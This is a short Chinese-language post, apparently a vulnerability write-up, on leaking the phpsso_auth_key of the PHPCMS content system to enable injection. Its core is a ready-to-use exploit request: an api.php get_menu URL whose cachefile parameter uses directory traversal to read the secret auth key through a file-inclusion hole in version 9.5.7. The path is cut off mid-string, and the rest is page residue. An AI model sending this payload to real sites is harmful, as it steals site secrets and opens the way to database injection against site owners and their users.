PHPCMS phpsso_auth_key泄露导致注入 测试环境9.6.0版本,其他版本未具体测试

  获取key   通过文件包含漏洞读取phpsso_auth_key (9.5.7中招,v9.6.0没有此漏洞): /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\
相关文章
相关标签/搜索